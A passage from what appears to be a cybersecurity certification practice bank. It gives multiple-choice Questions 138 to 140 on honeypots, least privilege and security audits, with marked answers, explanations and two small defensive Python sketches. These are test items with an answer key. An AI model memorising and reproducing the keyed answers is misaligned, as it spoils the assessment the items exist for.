User awareness is another key factor, as attackers often exploit human behavior through phishing or malicious links to facilitate MITM attacks. Educating users about secure communication practices, avoiding untrusted networks, and recognizing warning signs further reduces the risk.
In summary, MITM attacks highlight the importance of end-to-end encryption, proper authentication, network monitoring, and user vigilance. A combination of technical safeguards and informed behavior ensures the confidentiality, integrity, and trustworthiness of digital communications, mitigating the risks posed by interception attacks.
Question 138
Which of the following best defines a honeypot in cybersecurity?
A) A firewall that blocks attacks
B) A decoy system designed to attract attackers
C) A backup server for disaster recovery
D) A secure VPN endpoint
Answer: B) A decoy system designed to attract attackers
Explanation:
A honeypot is a deliberately vulnerable system designed to attract attackers and observe their activities without putting production systems at risk. It functions as a controlled environment where security teams can monitor malicious behavior, collect data on attack methods, and gain insights into the tools and techniques used by cybercriminals. Honeypots can be classified into low-interaction and high-interaction types. Low-interaction honeypots simulate limited services or systems, providing a basic environment that can detect automated attacks or simple probing attempts. High-interaction honeypots, on the other hand, offer fully functional system environments, allowing attackers to interact more extensively, which provides richer data about complex attack strategies, malware execution, and lateral movement techniques.
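A toy low-interaction honeypot can be as simple as a listener on an unused port that logs connection attempts and presents a fake service banner, as in the sketch below. The port and banner are arbitrary choices, and such a decoy should only ever run on an isolated, monitored host.

```python
import socket
from datetime import datetime, timezone

HOST, PORT = "0.0.0.0", 2222   # hypothetical decoy port for an SSH-like service

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, PORT))
    srv.listen()
    while True:
        conn, (ip, port) = srv.accept()
        with conn:
            # Log the probe: any connection here is suspicious by definition,
            # since no legitimate service lives on this port.
            print(f"{datetime.now(timezone.utc).isoformat()} probe from {ip}:{port}")
            conn.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")   # fake banner for the attacker
```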
By analyzing the behavior of attackers in a honeypot, organizations can identify malware signatures, exploit methods, and potential vulnerabilities that could affect real systems. Honeypots also act as early warning systems, detecting intrusion attempts before critical assets are targeted, enabling proactive defense measures. They support security research by providing real-world data on emerging threats and trends in cybercrime, helping security teams refine intrusion detection rules, improve incident response processes, and strengthen overall security posture.
Proper isolation, network segmentation, and continuous monitoring are essential to ensure that attackers cannot use the honeypot as a stepping stone to access production systems. When implemented correctly, honeypots complement traditional security tools by offering intelligence that is difficult to obtain through passive monitoring alone. They play a valuable role in intrusion detection, threat analysis, and proactive defense strategies, helping organizations better understand attacker behavior and prepare for real-world cyber threats.
Question 139
Which term refers to the principle of granting users the minimum level of access necessary to perform their duties?
A) Separation of duties
B) Least privilege
C) Need-to-know
D) Role-based access control
Answer: B) Least privilege
Explanation:
The principle of least privilege is a fundamental security concept that ensures users, processes, and systems are granted only the minimum level of access necessary to perform their specific tasks. By limiting permissions to what is strictly required, this principle reduces the risk of accidental or intentional misuse of resources, helps contain the impact of compromised accounts, and prevents unauthorized actions that could lead to privilege escalation attacks. Implementing least privilege minimizes the potential attack surface and enhances overall system security.
Enforcement of least privilege is typically achieved through access control mechanisms, such as role-based access control (RBAC) or discretionary access control (DAC), which assign permissions based on roles, responsibilities, or task requirements. Regular review and auditing of access rights are essential to ensure that permissions remain appropriate over time, especially when users change roles, departments, or responsibilities. Automated tools can assist in detecting excessive permissions and enforcing corrective actions.
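The kind of excessive-permission check mentioned above can be sketched by diffing granted permissions against observed usage; the data here is hypothetical, standing in for an IAM export and a period of access logs:

```python
# Hypothetical snapshots: what each user CAN do vs. what they actually DID.
granted = {"carol": {"read_reports", "run_payroll", "delete_records"}}
used    = {"carol": {"read_reports"}}

for user, perms in granted.items():
    excessive = perms - used.get(user, set())
    if excessive:
        # Unused grants are candidates for revocation under least privilege.
        print(f"{user}: review/revoke {sorted(excessive)}")
```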
Combining the principle of least privilege with other security practices, such as separation of duties, monitoring, and logging, further strengthens security posture. Separation of duties ensures that critical actions require multiple individuals or approval steps, reducing the risk of insider threats or fraudulent activity. Continuous monitoring and auditing provide visibility into access patterns, allowing organizations to detect anomalies or unauthorized attempts to escalate privileges.
Adopting the principle of least privilege not only protects sensitive data and critical systems but also supports regulatory compliance and risk management. By granting only necessary access, organizations can maintain accountability, minimize potential damage from compromised accounts or insider threats, and create a more resilient and secure computing environment.
Question 140
Which of the following best describes a security audit?
A) Installation of antivirus software
B) A review and evaluation of security controls and practices
C) Routine patch deployment
D) Configuration of firewalls
Answer: B) A review and evaluation of security controls and practices
Explanation:
A security audit is a structured and formal evaluation of an organization’s information systems, policies, procedures, and controls to assess their effectiveness, compliance, and exposure to risks. These audits are designed to identify vulnerabilities, inefficiencies, and gaps in security practices, providing a comprehensive view of the organization’s cybersecurity posture. Security audits can be conducted internally by in-house teams or externally by independent auditors to ensure objectivity and adherence to recognized standards.
Audits typically examine multiple areas, including access management, network security, data protection, incident response, system configuration, and regulatory compliance. They verify whether existing controls are properly implemented and whether security policies are followed consistently across the organization. Findings from security audits highlight weaknesses or potential risks and include actionable recommendations for improvement. They also serve as evidence of accountability, demonstrating to management, regulators, and stakeholders that appropriate safeguards are in place and functioning.
Organizations leverage security audits to strengthen defenses, reduce operational and regulatory risks, and align with industry standards such as ISO 27001, NIST frameworks, PCI DSS, HIPAA, or other relevant regulations. Beyond compliance, audits support proactive risk management by identifying issues before they are exploited and guiding the implementation of corrective measures.
Regularly scheduled audits promote continuous improvement, enabling organizations to adapt to evolving threats and changes in technology or business processes. By providing visibility into security controls and processes, security audits not only enhance operational security but also foster a culture of accountability and vigilance. Ultimately, conducting comprehensive security audits ensures that organizations maintain resilience, protect sensitive information, and demonstrate a strong commitment to cybersecurity excellence.